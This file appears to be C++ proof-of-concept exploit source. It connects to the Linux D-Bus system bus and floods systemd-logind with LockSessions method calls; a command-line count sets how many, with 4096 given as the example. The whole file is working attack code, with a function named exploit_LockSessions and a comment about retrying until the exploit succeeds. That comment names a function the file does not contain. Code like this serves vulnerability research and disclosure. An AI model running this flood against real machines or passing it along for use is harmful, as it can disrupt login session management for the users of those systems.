#include "dbus_utils.hpp"
#include "dbus_auth.hpp"
#include "utils.hpp"
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>

class DBusSocket : public AutoCloseFD {
public:
  DBusSocket(const uid_t uid, const char* filename) :
    AutoCloseFD(socket(AF_UNIX, SOCK_STREAM, 0))
  {
    if (get() < 0) {
      throw ErrorWithErrno("Could not create socket");
    }

    sockaddr_un address;
    memset(&address, 0, sizeof(address));
    address.sun_family = AF_UNIX;
    strcpy(address.sun_path, filename);

    if (connect(get(), (sockaddr*)(&address), sizeof(address)) < 0) {
      throw ErrorWithErrno("Could not connect socket");
    }

    dbus_sendauth(uid, get());

    dbus_send_hello(get());
    std::unique_ptr<DBusMessage> hello_reply1 = receive_dbus_message(get());
    std::string name = hello_reply1->getBody().getElement(0)->toString().getValue();
    std::unique_ptr<DBusMessage> hello_reply2 = receive_dbus_message(get());
  }
};

static void send_logind_LockSessions(const int fd, const uint32_t serialNumber) {
  dbus_method_call(
    fd,
    serialNumber,
    DBusMessageBody::mk0(),
    _s("/org/freedesktop/login1"),
    _s("org.freedesktop.login1.Manager"),
    _s("org.freedesktop.login1"),
    _s("LockSessions")
  );
}

// Keep trying `attempt_LockSessions_with_disconnect` with different
// delay values until the exploit succeeds (or we decide to give up).
static void exploit_LockSessions(
  const uid_t uid,
  const char* filename,
  const long n
) {
  DBusSocket fd(uid, filename);

  for (long i = 0; i < n; i++) {
    send_logind_LockSessions(fd.get(), i+1);
  }
}

static void usage(const char* progname) {
  fprintf(
    stderr,
    "usage:   %s <unix socket path> <number of messages to send>\n"
    "example: %s /var/run/dbus/system_bus_socket 4096\n",
    progname,
    progname
  );
}

int main(int argc, char* argv[]) {
  const char* progname = argc > 0 ? argv[0] : "a.out";
  if (argc != 3) {
    usage(progname);
    return EXIT_FAILURE;
  }

  char* endptr = 0;
  const long n = strtol(argv[2], &endptr, 0);
  if (endptr == argv[2] || *endptr != '\0') {
    usage(progname);
    return EXIT_FAILURE;
  }

  const uid_t uid = getuid();
  const char* filename = argv[1];

  for (size_t i = 0; i < 1; i++) {
    exploit_LockSessions(uid, filename, n);
  }

  return EXIT_SUCCESS;
}
